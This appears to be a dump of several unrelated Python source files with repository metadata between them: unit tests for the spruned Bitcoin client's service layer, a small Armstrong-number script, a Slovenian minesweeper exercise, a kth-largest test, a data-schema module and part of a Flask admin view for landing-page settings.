from spruned.application.cache import CacheAgent
from spruned.application.exceptions import ServiceException, InvalidPOWException
from spruned.application.spruned_vo_service import SprunedVOService
from spruned.daemon.exceptions import ElectrodMissingResponseException
from test.utils import async_coro
class TestVOService(unittest.TestCase):
def setUp(self):
self.loop = asyncio.get_event_loop()
self.electrod = Mock()
self.p2p = Mock()
self.repository = Mock()
self.cache = create_autospec(CacheAgent)
self.sut = SprunedVOService(
self.electrod, self.p2p, cache=self.cache, repository=self.repository
)
hb = '000000206ad001ecab39a3267ac6db2ccea9e27907b011bc70324c00000000000000000048043a6a' \
'574d8d826af9477804d3a4ac116a411d194c0b86d950168163c4d4232364ad5aa38955175cd60695'
hh = '000000000000000000376267d342878f869cb68192ff5d73f5f1953ae83e3e1e'
hb = binascii.unhexlify(hb.encode())
self.header = {
'header_bytes': hb,
'block_hash': hh,
'block_height': 513979,
'prev_block_hash': '0000000000000000004c3270bc11b00779e2a9ce2cdbc67a26a339abec01d06a'
}
self.response_header = {
'bits': 391481763,
'chainwork': 'Not Implemented Yet',
'confirmations': 2,
'difficulty': 'Not Implemented Yet',
'hash': '000000000000000000376267d342878f869cb68192ff5d73f5f1953ae83e3e1e',
'height': 513979,
'mediantime': 1521312803,
'merkleroot': '23d4c463811650d9860b4c191d416a11aca4d3047847f96a828d4d576a3a0448',
'nextblockhash': None,
'nonce': 2500253276,
'previousblockhash': '0000000000000000004c3270bc11b00779e2a9ce2cdbc67a26a339abec01d06a',
'time': 1521312803,
'version': 536870912,
'versionHex': 'Not Implemented Yet'
}
def tearDown(self):
self.electrod.reset_mock()
self.repository.reset_mock()
def test_getblock_not_found(self):
self.repository.headers.get_block_header.return_value = None
block = self.loop.run_until_complete(
self.sut.getblock('00000000839a8e6886ab5951d76f411475428afc90947ee320161bbf18eb6048', 1)
)
self.assertEqual(block, None)
def test_getblock_full_verbose(self):
self.repository.headers.get_block_header.return_value = None
with self.assertRaises(NotImplementedError):
self.loop.run_until_complete(
self.sut.getblock('00000000839a8e6886ab5951d76f411475428afc90947ee320161bbf18eb6048', 2)
)
def test_getblock_verbose(self):
header_hex = '010000006fe28c0ab6f1b372c1a6a246ae63f74f931e8365e15a089c68d6190000000000982051' \
'fd1e4ba744bbbe680e1fee14677ba1a3c3540bf7b1cdb606e857233e0e61bc6649ffff001d01e36299'
block_json = {
"hash": "00000000839a8e6886ab5951d76f411475428afc90947ee320161bbf18eb6048",
"height": 1,
"version": 1,
"versionHex": "Not Implemented Yet",
"merkleroot": "0e3e2357e806b6cdb1f70b54c3a3a17b6714ee1f0e68bebb44a74b1efd512098",
"time": 1231469665,
"mediantime": 1231469665,
"nonce": 2573394689,
"bits": 486604799,
"difficulty": "Not Implemented Yet",
"chainwork": "Not Implemented Yet",
"previousblockhash": "000000000019d6689c085ae165831e934ff763ae46a2a6c172b3f1b60a8ce26f",
"nextblockhash": "000000006a625f06636b8bb6ac7b960a8d03705d1ace08b1a19da3fdcc99ddbd",
"tx": [
"0e3e2357e806b6cdb1f70b54c3a3a17b6714ee1f0e68bebb44a74b1efd512098"
]
}
self.repository.headers.get_best_header.return_value = {'block_height': 513980}
self.repository.headers.get_block_header.return_value = {
'block_hash': block_json['hash'],
'block_height': block_json['height'],
'header_bytes': binascii.unhexlify(header_hex.encode()),
'next_block_hash': block_json['nextblockhash']
}
hex_block ='010000006fe28c0ab6f1b372c1a6a246ae63f74f931e8365e15a089c68d6190000000000982051fd1e4ba744bbbe6' \
'80e1fee14677ba1a3c3540bf7b1cdb606e857233e0e61bc6649ffff001d01e3629901010000000100000000000000' \
'00000000000000000000000000000000000000000000000000ffffffff0704ffff001d0104ffffffff0100f2052a0' \
'100000043410496b538e853519c726a2c91e61ec11600ae1390813a627c66fb8be7947be63c52da7589379515d4e0' \
'a604f8141781e62294721166bf621e73a82cbf2342c858eeac00000000'
block_bytes = binascii.unhexlify(hex_block.encode())
self.repository.blockchain.get_block.return_value = {
'block_hash': '00000000839a8e6886ab5951d76f411475428afc90947ee320161bbf18eb6048',
'block_bytes': block_bytes
}
block = self.loop.run_until_complete(
self.sut.getblock('00000000839a8e6886ab5951d76f411475428afc90947ee320161bbf18eb6048', 1)
)
block_json = {
"hash": "00000000839a8e6886ab5951d76f411475428afc90947ee320161bbf18eb6048",
"height": 1,
"version": 1,
"versionHex": "Not Implemented Yet",
"merkleroot": "0e3e2357e806b6cdb1f70b54c3a3a17b6714ee1f0e68bebb44a74b1efd512098",
"time": 1231469665,
"mediantime": 1231469665,
"nonce": 2573394689,
"bits": 486604799,
"difficulty": "Not Implemented Yet",
"chainwork": "Not Implemented Yet",
"previousblockhash": "000000000019d6689c085ae165831e934ff763ae46a2a6c172b3f1b60a8ce26f",
"nextblockhash": "000000006a625f06636b8bb6ac7b960a8d03705d1ace08b1a19da3fdcc99ddbd",
"tx": [
"0e3e2357e806b6cdb1f70b54c3a3a17b6714ee1f0e68bebb44a74b1efd512098"
]
}
self.assertEqual(block, block_json)
def test_getblock_non_verbose(self):
self.repository.headers.get_best_header.return_value = {'block_height': 513980}
self.repository.headers.get_block_header.return_value = self.header
self.repository.blockchain.get_block.return_value = {
'block_hash': '000000000000000000376267d342878f869cb68192ff5d73f5f1953ae83e3e1e',
'block_bytes': binascii.unhexlify('cafebabe'.encode())
}
block = self.loop.run_until_complete(
self.sut.getblock('000000000000000000376267d342878f869cb68192ff5d73f5f1953ae83e3e1e', 0)
)
self.assertEqual(block, 'cafebabe')
def test_getblock_p2p_non_verbose(self):
hex_block ='010000006fe28c0ab6f1b372c1a6a246ae63f74f931e8365e15a089c68d6190000000000982051fd1e4ba744bbbe6' \
'80e1fee14677ba1a3c3540bf7b1cdb606e857233e0e61bc6649ffff001d01e3629901010000000100000000000000' \
'00000000000000000000000000000000000000000000000000ffffffff0704ffff001d0104ffffffff0100f2052a0' \
'100000043410496b538e853519c726a2c91e61ec11600ae1390813a627c66fb8be7947be63c52da7589379515d4e0' \
'a604f8141781e62294721166bf621e73a82cbf2342c858eeac00000000'
bytes_block = binascii.unhexlify(hex_block.encode())
self.repository.headers.get_best_header.return_value = {'block_height': 513980}
self.repository.headers.get_block_header.return_value = self.header
self.repository.blockchain.get_block.return_value = None
self.repository.blockchain.async_save_block.return_value = async_coro(True)
self.p2p.get_block.side_effect = [
async_coro(None),
async_coro(
{
'block_hash': '00000000839a8e6886ab5951d76f411475428afc90947ee320161bbf18eb6048',
'block_bytes': bytes_block,
'block_object': Block.parse(io.BytesIO(bytes_block))
}
)
]
block = self.loop.run_until_complete(
self.sut.getblock('000000000000000000376267d342878f869cb68192ff5d73f5f1953ae83e3e1e', 0)
)
self.assertEqual(block, hex_block)
def test_getblock_p2p_non_verbose_network_error(self):
self.repository.headers.get_best_header.return_value = {'block_height': 513980}
self.repository.headers.get_block_header.return_value = self.header
self.repository.blockchain.get_block.return_value = None
self.p2p.get_block.side_effect = lambda *a, **kw: async_coro(None)
with self.assertRaises(ServiceException):
self.loop.run_until_complete(
self.sut.getblock('000000000000000000376267d342878f869cb68192ff5d73f5f1953ae83e3e1e', 0)
)
def test_getrawtransaction_non_verbose_not_in_block(self):
self.repository.blockchain.get_json_transaction.return_value = None
tx = {
'hex': '01000000000101531213685738c91df5ceb1537605b4e17d0e623c34ead12b9e285495cd5da9b80000000000ffffffff0248d'
'00500000000001976a914fa511ca56ee17f57b8190ad490c4e5bf7ef0e34b88ac951e00000000000016001458e05b9b412c3b'
'4f35bdb54f47376beaeb8f81aa024830450221008a6edb6ce73676d4065ffb810f3945b3c3554025d3d7545bfca7185aaff62'
'0cc022066e2f0640aeb0775e4b47701472b28d1018b4ab8fd688acbdcd757b75c2731b6012103dfc2e6847645ca8057120780'
'e5ae6fa84be76b39465cd2a5158d1fffba78b22600000000'
}
self.electrod.getrawtransaction.return_value = async_coro(tx)
res = self.loop.run_until_complete(
self.sut.getrawtransaction(
'dbae729fc6cce1bc922e66f4f12eb2b43ef57406bf5a0818eb2e73696b713b91',
verbose=False
)
)
self.assertEqual(res, tx['hex'])
def test_getrawtransaction_verbose_not_in_block(self):
self.repository.get_block_header.return_value = self.header
self.repository.blockchain.get_json_transaction.return_value = None
tx = {
'hex': '01000000000101531213685738c91df5ceb1537605b4e17d0e623c34ead12b9e285495cd5da9b80000000000ffffffff0248d'
'00500000000001976a914fa511ca56ee17f57b8190ad490c4e5bf7ef0e34b88ac951e00000000000016001458e05b9b412c3b'
'4f35bdb54f47376beaeb8f81aa024830450221008a6edb6ce73676d4065ffb810f3945b3c3554025d3d7545bfca7185aaff62'
'0cc022066e2f0640aeb0775e4b47701472b28d1018b4ab8fd688acbdcd757b75c2731b6012103dfc2e6847645ca8057120780'
'e5ae6fa84be76b39465cd2a5158d1fffba78b22600000000'
}
self.repository.get_best_header.return_value = {'block_height': 513980}
self.electrod.getrawtransaction.return_value = async_coro(tx)
res = self.loop.run_until_complete(
self.sut.getrawtransaction(
'dbae729fc6cce1bc922e66f4f12eb2b43ef57406bf5a0818eb2e73696b713b91',
verbose=True
)
)
self.assertEqual(res, tx)
def test_getrawtransaction_verbose_in_block(self):
header_hex = '010000006fe28c0ab6f1b372c1a6a246ae63f74f931e8365e15a089c68d6190000000000982051' \
'fd1e4ba744bbbe680e1fee14677ba1a3c3540bf7b1cdb606e857233e0e61bc6649ffff001d01e36299'
block_json = {
"hash": "00000000839a8e6886ab5951d76f411475428afc90947ee320161bbf18eb6048",
"height": 1,
"version": 1,
"versionHex": "Not Implemented Yet",
"merkleroot": "0e3e2357e806b6cdb1f70b54c3a3a17b6714ee1f0e68bebb44a74b1efd512098",
"time": 1231469665,
"mediantime": 1231469665,
"nonce": 2573394689,
"bits": 486604799,
"difficulty": "Not Implemented Yet",
"chainwork": "Not Implemented Yet",
"previousblockhash": "000000000019d6689c085ae165831e934ff763ae46a2a6c172b3f1b60a8ce26f",
"nextblockhash": "000000006a625f06636b8bb6ac7b960a8d03705d1ace08b1a19da3fdcc99ddbd",
"tx": [
"0e3e2357e806b6cdb1f70b54c3a3a17b6714ee1f0e68bebb44a74b1efd512098"
]
}
self.repository.headers.get_best_header.return_value = {'block_height': 513980}
self.repository.headers.get_block_header.return_value = {
'block_hash': block_json['hash'],
'block_height': block_json['height'],
'header_bytes': binascii.unhexlify(header_hex.encode()),
'next_block_hash': block_json['nextblockhash']
}
self.repository.get_block_header.return_value = self.header
self.repository.blockchain.get_json_transaction.return_value = None
tx = {
'hex': '01000000010000000000000000000000000000000000000000000000000000000000000000ffffffff0704ffff00'
'1d0104ffffffff0100f2052a0100000043410496b538e853519c726a2c91e61ec11600ae1390813a627c66fb8be7'
'947be63c52da7589379515d4e0a604f8141781e62294721166bf621e73a82cbf2342c858eeac00000000',
'blockhash': '00000000839a8e6886ab5951d76f411475428afc90947ee320161bbf18eb6048',
'confirmations': 6
}
self.repository.get_best_header.return_value = {'block_height': 513980}
self.electrod.getrawtransaction.return_value = async_coro(tx)
self.electrod.get_merkleproof.return_value = async_coro({'block_height': 1, 'merkle': [], 'pos': 0})
res = self.loop.run_until_complete(
self.sut.getrawtransaction(
'0e3e2357e806b6cdb1f70b54c3a3a17b6714ee1f0e68bebb44a74b1efd512098',
verbose=True
)
)
self.assertEqual(res, tx)
def test_getrawtransaction_verbose_in_block_invalid_pow(self):
header_hex = '010000006fe28c0ab6f1b372c1a6a246ae63f74f931e8365e15a089c68d6190000000000982051' \
'fd1e4ba744bbbe680e1fee14677ba1a3c3540bf7b1cdb606e857233e0e61bc6649ffff001d01e36299'
block_json = {
"hash": "00000000839a8e6886ab5951d76f411475428afc90947ee320161bbf18eb6048",
"height": 1,
"version": 1,
"versionHex": "Not Implemented Yet",
"merkleroot": "0e3e2357e806b6cdb1f70b54c3a3a17b6714ee1f0e68bebb44a74b1efd512098",
"time": 1231469665,
"mediantime": 1231469665,
"nonce": 2573394689,
"bits": 486604799,
"difficulty": "Not Implemented Yet",
"chainwork": "Not Implemented Yet",
"previousblockhash": "000000000019d6689c085ae165831e934ff763ae46a2a6c172b3f1b60a8ce26f",
"nextblockhash": "000000006a625f06636b8bb6ac7b960a8d03705d1ace08b1a19da3fdcc99ddbd",
"tx": [
"0e3e2357e806b6cdb1f70b54c3a3a17b6714ee1f0e68bebb44a74b1efd512098"
]
}
self.repository.headers.get_best_header.return_value = {'block_height': 513980}
self.repository.headers.get_block_header.return_value = {
'block_hash': block_json['hash'],
'block_height': block_json['height'],
'header_bytes': binascii.unhexlify(header_hex.encode()),
'next_block_hash': block_json['nextblockhash']
}
self.repository.get_block_header.return_value = self.header
self.repository.blockchain.get_json_transaction.return_value = None
tx = {
'hex': '01000000010000000000000000000000000000000000000000000000000000000000000000ffffffff0704ffff00'
'1d0104ffffffff0100f2052a0100000043410496b538e853519c726a2c91e61ec11600ae1390813a627c66fb8be7'
'947be63c52da7589379515d4e0a604f8141781e62294721166bf621e73a82cbf2342c858eeac00000000',
'blockhash': '00000000839a8e6886ab5951d76f411475428afc90947ee320161bbf18eb6048',
'confirmations': 6
}
self.repository.get_best_header.return_value = {'block_height': 513980}
self.electrod.getrawtransaction.return_value = async_coro(tx)
self.electrod.get_merkleproof.return_value = async_coro({'block_height': 1, 'merkle': ['ff'*32], 'pos': 0})
with self.assertRaises(InvalidPOWException):
self.loop.run_until_complete(
self.sut.getrawtransaction(
'0e3e2357e806b6cdb1f70b54c3a3a17b6714ee1f0e68bebb44a74b1efd512098',
verbose=True
)
)
def test_getbestblockhash(self):
self.repository.headers.get_best_header.return_value = {'block_hash': 'cafebabe'}
res = self.loop.run_until_complete(self.sut.getbestblockhash())
self.assertEqual(res, 'cafebabe')
def test_getblockhash(self):
self.repository.headers.get_block_hash.return_value = 'cafebabe'
res = self.loop.run_until_complete(self.sut.getblockhash(123))
self.assertEqual(res, 'cafebabe')
def test_getblockheader(self):
self.repository.headers.get_best_header.return_value = {'block_height': 513980}
self.repository.headers.get_block_header.return_value = self.header
res = self.loop.run_until_complete(
self.sut.getblockheader(
'000000000000000000376267d342878f869cb68192ff5d73f5f1953ae83e3e1e'
)
)
self.assertEqual(
res,
self.response_header
)
def test_block_count(self):
self.repository.headers.get_best_header.return_value = {'block_height': 6}
res = self.loop.run_until_complete(self.sut.getblockcount())
self.assertEqual(res, 6)
def test_estimatefee(self):
self.electrod.estimatefee.side_effect = [ElectrodMissingResponseException(), async_coro('fee estimation')]
res = self.loop.run_until_complete(self.sut.estimatefee(6))
self.assertEqual(res, 'fee estimation')
def test_getbestblockheader(self):
self.repository.headers.get_best_header.return_value = {
'block_height': 513980,
'block_hash': '0000000000000000001a0822fbaef92ef048967fa32c68f96e3d57d13183ef2b'
}
self.repository.headers.get_block_header.return_value = self.header
res = self.loop.run_until_complete(self.sut.getbestblockheader(verbose=False))
self.assertEqual(
res,
'000000206ad001ecab39a3267ac6db2ccea9e27907b011bc70324c00000000000000000048043a6a'
'574d8d826af9477804d3a4ac116a411d194c0b86d950168163c4d4232364ad5aa38955175cd60695'
)
res = self.loop.run_until_complete(self.sut.getbestblockheader(verbose=True))
self.assertEqual(res, self.response_header)
def test_getblockchaininfo(self):
from spruned import __version__ as spruned_version
from spruned import __bitcoind_version_emulation__ as bitcoind_version
self.repository.headers.get_best_header.return_value = self.header
self.p2p.bootstrap_status = 0
res = self.loop.run_until_complete(self.sut.getblockchaininfo())
self.assertEqual(
res,
{
'chain': 'main',
'warning': 'spruned {}, emulating bitcoind v{}'.format(spruned_version, bitcoind_version),
'blocks': 513979,
'headers': 513979,
'bestblockhash': '000000000000000000376267d342878f869cb68192ff5d73f5f1953ae83e3e1e',
'difficulty': None,
'chainwork': None,
'mediantime': 1521312803,
'verificationprogress': 0,
'pruned': False
}
)
def test_gettxout(self):
tx = '01000000010000000000000000000000000000000000000000000000000000000000000000ffffffff0704ffff00' \
'1d0104ffffffff0100f2052a0100000043410496b538e853519c726a2c91e61ec11600ae1390813a627c66fb8be7' \
'947be63c52da7589379515d4e0a604f8141781e62294721166bf621e73a82cbf2342c858eeac00000000'
self.repository.get_best_header.return_value = {'block_height': 513980}
self.electrod.getrawtransaction.return_value = async_coro(tx)
self.repository.blockchain.get_transaction.return_value = None
self.electrod.listunspents_by_scripthash.side_effect = [ElectrodMissingResponseException,
async_coro(
[{'tx_hash': '0e3e2357e806b6cdb1f70b54c3a3a17b6714ee1f0e68bebb44a74b1efd512098',
'tx_pos': 0, 'height': 0, 'value': 1}]
)]
self.repository.headers.get_best_header.return_value = {
'block_height': 513980, 'block_hash': '0000000000000000001a0822fbaef92ef048967fa32c68f96e3d57d13183ef2b'
}
res = self.loop.run_until_complete(
self.sut.gettxout(
'0e3e2357e806b6cdb1f70b54c3a3a17b6714ee1f0e68bebb44a74b1efd512098', 0
)
)
self.assertEqual(
res,
{
"bestblock": "0000000000000000001a0822fbaef92ef048967fa32c68f96e3d57d13183ef2b",
"confirmations": 513980,
"value": "0.00000001",
"scriptPubKey": {
"asm": "",
"hex": "410496b538e853519c726a2c91e61ec11600ae1390813a627c66fb8be7947be63c52da7"
"589379515d4e0a604f8141781e62294721166bf621e73a82cbf2342c858eeac",
"reqSigs": 0,
"type": "",
"addresses": []
}
}
)
|
[
"[email protected]"
] | |
82c22ab3f3403a1a2baf72e25753d76f9ac0fb61
|
761b013bc7cd98850f3f26e3f0b0a8e4ec8fdf7d
|
/arm.py
|
833bd4af8bd165347ac2ea8e3bc4affa52299173
|
[] |
no_license
|
tjmode/placement
|
72e6bca120cb785cac3fc829d84b921af8add01a
|
ac5af6394e74212bf44510af837a144254ca2f99
|
refs/heads/master
| 2020-04-15T16:36:03.489076 | 2019-07-31T06:14:51 | 2019-07-31T06:14:51 | 164,842,584 | 2 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 189 |
py
|
num = int(input())
order = len(str(num))
sum = 0
temp = num
while temp > 0:
digit = temp % 10
sum += digit ** order
temp //= 10
if num == sum:
print("yes")
else:
print("no")
|
[
"[email protected]"
] | |
f0e6d7d0c53802aa01ca3c267ba04ebe3f7bb546
|
99c4d4a6592fded0e8e59652484ab226ac0bd38c
|
/code/batch-1/vse-naloge-brez-testov/DN7-M-182.py
|
4b4ce11c5808c697cbb1e47ed4e9be02e9751e48
|
[] |
no_license
|
benquick123/code-profiling
|
23e9aa5aecb91753e2f1fecdc3f6d62049a990d5
|
0d496d649247776d121683d10019ec2a7cba574c
|
refs/heads/master
| 2021-10-08T02:53:50.107036 | 2018-12-06T22:56:38 | 2018-12-06T22:56:38 | 126,011,752 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 6,845 |
py
|
# To funkcijo prijazno podarjam vsem, ki bodo programirali v eni vrstici. :)
# Kako jo uporabiti, je v navodilih. Kdor je ne potrebuje, naj jo ignorira.
def vsa_polja(s, v):
"""
Generiraj vse koordinate (x, y) za polje s podano širino in višino
Args:
s (int): širina
v (int): višina
Returns:
generator parov polj
"""
return ((x, y) for x in range(s) for y in range(v))
########################
# Za oceno 6
def sosedov(x, y, mine):
"""
Vrni število sosedov polja s koordinatami `(x, y)` na katerih je mina.
Polje samo ne šteje.
Args:
x (int): koordinata x
y (int): koordinata y
mine (set of tuple of int): koordinate min
Returns:
int: število sosedov
"""
def najvec_sosedov(mine, s, v):
"""
Vrni koordinati polja z največ sosednjih min
Args:
mine (set of (int, int)): koordinate min
s (int): širina polja
v (int): višina polja
Returns:
tuple of int: koordinati polja
"""
def brez_sosedov(mine, s, v):
"""
Vrni množico koordinat polj brez min na sosednjih poljih. Polje samo lahko
vsebuje mino.
Args:
mine (set of tuple of int): koordinate min
s (int): širina polja
v (int): višina polja
Returns:
set of tuple: polja brez min na sosednjih poljih
"""
def po_sosedih(mine, s, v):
"""
Vrni slovar, katerega ključi so možna števila sosednjih polj z minami
(torej števila od 0 do 8), vrednosti pa množice koordinat polj s toliko
sosedami.
Args:
mine (set of tuple of int): koordinate min
s (int): širina polja
v (int): višina polja
Returns:
dict: (glej zgoraj)
"""
########################
# Za oceno 7
def dolzina_poti(pot):
"""
Vrni dolžino podane poti, vključno z vmesnimi polji.
Args:
pot (list of tuple): seznam koordinat polj
Returns:
int: dolžina poti
"""
def varen_premik(x0, y0, x1, y1, mine):
"""
Vrni `True`, če je pomik z (x0, y0) and (x1, y1) varen, `False`, če ni.
Args:
x0 (int): koordinata x začetnega polja
y0 (int): koordinata y začetnega polja
x1 (int): koordinata x končnega polja
y1 (int): koordinata y končnega polja
mine (set of tuple of int): koordinate min
Returns:
bool: `True`, če je premik varen, `False`, če ni.
"""
def varna_pot(pot, mine):
"""
Vrni `True`, če je podana pot varna, `False`, če ni.
Args:
pot (list of tuple of int): koordinate točk na poti (brez vmesnih točk)
mine (set of tuple of int): koordinate min
Returns:
bool: `True`, če je pot varna, `False`, če ni.
"""
########################
# Za oceno 8
def polje_v_mine(polje):
"""
Vrni koordinate min v podanem polju.
Niz polje opisuje polje tako, da so vodoravne "vrstice" polja ločene s
presledki. Prosta polja so označena z znako `.`, mine z `X`.
Args:
polje (str): polje
Returns:
mine (set of tuple of int): koordinate min
s (int): širina polja
v (int): višina polja.
"""
########################
# Za oceno 9
#
# Vse funkcije za oceno 6 in 7 morajo biti napisane v eni vrstici.
########################
# Za oceno 10
def preberi_pot(ukazi):
"""
Za podani seznam ukazov (glej navodila naloge) vrni pot.
Args:
ukazi (str): ukazi, napisani po vrsticah
Returns:
list of tuple of int: pot
"""
def zapisi_pot(pot):
"""
Za podano pot vrni seznam ukazov (glej navodila naloge).
Args:
pot (list of tuple of int): pot
Returns:
str: ukazi, napisani po vrsticah
"""
def sosedov(x, y, mine):
stevec=0
for x1, y1 in mine:
if ((x1 + 1) == x) and y1 == y:
stevec = stevec + 1
if ((x1 - 1) == x) and y1 == y:
stevec = stevec + 1
if (((x1 + 1) == x) and (y1 + 1 == y)):
stevec = stevec + 1
if (((x1 - 1) == x) and (y1 + 1 == y)):
stevec = stevec + 1
if ((x1 == x) and (y1 + 1 == y)):
stevec = stevec + 1
if (((x1 + 1) == x) and (y1 - 1 == y)):
stevec = stevec + 1
if (((x1 - 1) == x) and (y1 - 1 == y)):
stevec = stevec + 1
if ((x1 == x) and (y1 - 1 == y)):
stevec = stevec + 1
return stevec
def najvec_sosedov(mine, s, v):
največ_min=0
maskimum_koordinate=0,0
for x,y in vsa_polja(s,v):
vsota_min=sosedov(x,y,mine)
if vsota_min>največ_min:
največ_min=vsota_min
maskimum_koordinate=x,y
return maskimum_koordinate
def brez_sosedov(mine, s, v):
seznam_koordinat=set()
koordinate_brez_min=0,0
for x,y in vsa_polja(s,v):
brez_min=sosedov(x,y,mine)
if brez_min==0:
koordinate_brez_min=x,y
seznam_koordinat.add(koordinate_brez_min)
return seznam_koordinat
def po_sosedih(mine, s, v):
slovar_sosedi={}
i=0
while i <= 8:
seznam_koordinat = set()
for x, y in vsa_polja(s, v):
brez_min = sosedov(x, y, mine)
if brez_min == i:
seznam_koordinat.add((x,y))
slovar_sosedi[i]=seznam_koordinat
i=i+1
return slovar_sosedi
def dolzina_poti(pot):
dolzina = 0
razdalja2 = 0
razdalja1 = 0
for x, y in pot:
x1 = x
y1 = y
break
for x, y in pot:
razdalja1 = y - y1
if razdalja1 < 0:
razdalja1 = razdalja1 + 2 * (-razdalja1)
dolzina = dolzina + razdalja1
razdalja2 = x - x1
if razdalja2 < 0:
razdalja2 = razdalja2 + 2 * (-razdalja2)
dolzina = dolzina + razdalja2
x1 = x
y1 = y
return (dolzina)
def varen_premik(x0, y0, x1, y1, mine):
for a, b in mine:
if (x0 <= a <= x1 or x1 <= a <= x0) and (y0 <= b <= y1 or y1 <= b <= y0):
return False
return True
def varna_pot(pot, mine):
for x0, y0 in pot:
for a, b in mine:
if x0 == a and y0 == b:
return False
for (x0, y0), (x1, y1) in zip(pot, pot[1:]):
for a, b in mine:
if (x0 <= a <= x1 or x1 <= a <= x0) and (y0 <= b <= y1 or y1 <= b <= y0):
return False
return True
def polje_v_mine(polje):
sirina=len(polje.split()[0])
visina=len(polje.split())
x = 0
y = 0
stevec_y = 1
mnozica_min=set()
for p in polje:
if p == ".":
x = x + 1
if p == " ":
y = y + 1
x = 0
if p == "X":
mina = x, y
x = x + 1
mnozica_min.add(mina)
return (mnozica_min,sirina,visina)
|
[
"[email protected]"
] | |
a63c062cdb9013fbce1c5eaec2a18d8d71f46f16
|
220dd5d666b85b716d5762097fb2d320bb8587fd
|
/test/int/kth_largest.py
|
0deb333531b86715608b4220b28bf4dfb7edd0fa
|
[] |
no_license
|
bensenberner/ctci
|
011946a335396def198acaa596d2b5902af7b993
|
1e1ba64580ee96392c92aa95904c4751e32d4e30
|
refs/heads/master
| 2021-01-10T14:09:01.698323 | 2020-09-06T04:17:53 | 2020-09-06T04:17:53 | 45,659,115 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 345 |
py
|
import unittest
from int.kth_largest import kth_largest
class Test(unittest.TestCase):
def test(self):
arr = [7, 5, 2, 7, 1, 8, 3]
self.assertEqual(5, kth_largest(arr, 4))
def test_simple(self):
arr = [3, 2, 1]
self.assertEqual(3, kth_largest(arr, 1))
self.assertEqual(2, kth_largest(arr, 2))
|
[
"[email protected]"
] | |
9c9fec3a233bcb7fb1af897298b1c336ccdc7b53
|
f6c103bd11b6a7fe92a2fc48562a06c87a60ac51
|
/lard/data.py
|
e20f63ae7dd15b080427aa653f9a03ea5b66aa0e
|
[] |
no_license
|
brettviren/lard
|
d17405ab2df1e8f8ef22a2706f0dcad3fe5b06e7
|
429d71c9912b62f47d18e25c5063eb66d36f6d93
|
refs/heads/master
| 2021-01-10T14:21:59.327286 | 2015-05-25T02:59:01 | 2015-05-25T02:59:01 | 36,177,192 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,255 |
py
|
#!/usr/bin/env python
'''The lard data model.
The objects in this module make up an internal, transient data schema.
Modules under lard.adapters produce this data model and modules under
lard.renderers accept it to produce some end form.
'''
from collections import namedtuple
ScalarPoint = namedtuple('ScalarPoint', 'x y z s')
def CastScalarPoint(d):
if type(d) == dict:
return ScalarPoint(float(d['x']),float(d['y']),float(d['z']),float(d['s']))
if type(d) == tuple or type(d) == list:
return ScalarPoint(float(d[0]),float(d[1]),float(d[2]),float(d[3]))
return ScalarPoint(float(d.x),float(d.y),float(d.z),float(d.s))
#from schema import Schema, Use, Optional
from voluptuous import Schema, Optional
# schema v1 is a pair of lists of scalar point values, for simulation "truth" and reconstructed.
schema_v1 = Schema(
{
Optional('truth'): [CastScalarPoint],
Optional('recon'): [CastScalarPoint],
}
)
# Most recent version
schema = schema_v1
def validate(data, version=None):
'Validate data against schema'
if version is None:
return schema(data)
if version == 'v1' or version == 1:
return schema_v1(data)
return version(data) # assume version is a Schema object
|
[
"[email protected]"
] | |
3af9d7000fa029acf9ab00357f727462d5bb3e49
|
0be8bd02d3b93d89eba2174313c1599e1993589d
|
/businessmanager/app/operational/admin/frontend.py
|
c0a79f0155dabc50606f5b86b05001324769593a
|
[
"MIT"
] |
permissive
|
Mr82/marketplace
|
ac1b5e83dbd759965b4ea2d244b80987da747794
|
edc55e3e622656a6b6e72ecc1b88b900e05994f3
|
refs/heads/master
| 2022-12-11T12:32:02.463053 | 2020-09-18T09:14:44 | 2020-09-18T09:14:44 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 8,618 |
py
|
from datetime import datetime
from flask import Blueprint, render_template, redirect, url_for, flash, abort, request
from flask_login import login_required, current_user
import commonmark
from app import db
from app.decorators import admin_required
from app.models import EditableHTML, Role, User, Organisation, Message, ContactMessage, LandingSetting, LandingImage, OurBrand
from app.operational.admin.views import admin
from wtforms import Flags
from .forms import (
LandingSettingForm,
LandingImageForm,
OurBrandForm
)
from flask_uploads import UploadSet, IMAGES
from flask_wtf.file import FileAllowed
images = UploadSet('images', IMAGES)
photos = UploadSet('photos', IMAGES)
@admin.route('/settings/dashboard/')
@login_required
@admin_required
def frontend_dashboard():
"""Frontend dashboard page."""
return render_template('admin/frontend_settings_dashboard.html')
@admin.route('/landing-settings', methods=['GET', 'POST'])
@admin.route('/edit/<int:id>', methods=['GET', 'POST'])
@login_required
@admin_required
def landing_setting(id=None):
"""Adds information to the landing page."""
settings = db.session.query(LandingSetting.id).count()
if settings == 1:
return redirect(url_for('admin.edit_landing_setting', id=1))
form = LandingSettingForm()
if request.method == 'POST':
settings = LandingSetting(
site_name = form.site_name.data,
title = form.title.data,
description = form.description.data,
twitter_name = form.twitter_name.data,
facebook_name = form.facebook_name.data,
instagram_name=form.instagram_name.data,
linkedin_name = form.linkedin_name.data,
tiktok_name = form.tiktok_name.data,
snap_chat_name = form.snap_chat_name.data,
youtube = form.youtube.data,
blog = form.blog.data,
about = form.about.data,
contact = form.contact.data,
faq = form.faq.data,
featured_title_one = form.featured_title_one.data,
featured_title_one_text = form.featured_title_one_text.data,
featured_title_one_icon = form.featured_title_one_icon.data,
featured_title_two = form.featured_title_two.data,
featured_title_two_text = form.featured_title_two_text.data,
featured_title_two_icon = form.featured_title_two_icon.data,
featured_title_three = form.featured_title_three.data,
featured_title_three_text = form.featured_title_three_text.data,
featured_title_three_icon = form.featured_title_three_icon.data,
google_analytics_id = form.google_analytics_id.data,
other_tracking_analytics_one = form.other_tracking_analytics_one.data,
other_tracking_analytics_two = form.other_tracking_analytics_two.data,
block_content_one = form.block_content_one.data
)
db.session.add(settings)
db.session.commit()
flash('Settings successfully added', 'success')
return redirect(url_for('admin.edit_landing_setting', id=id))
return render_template('admin/new_landing_setting.html', form=form)
@admin.route('/edit-landing-settings/<int:id>', methods=['GET', 'POST'])
@login_required
@admin_required
def edit_landing_setting(id):
"""Edit information to the landing page."""
settings = LandingSetting.query.get(id)
form = LandingSettingForm(obj=settings)
if request.method == 'POST':
form.populate_obj(settings)
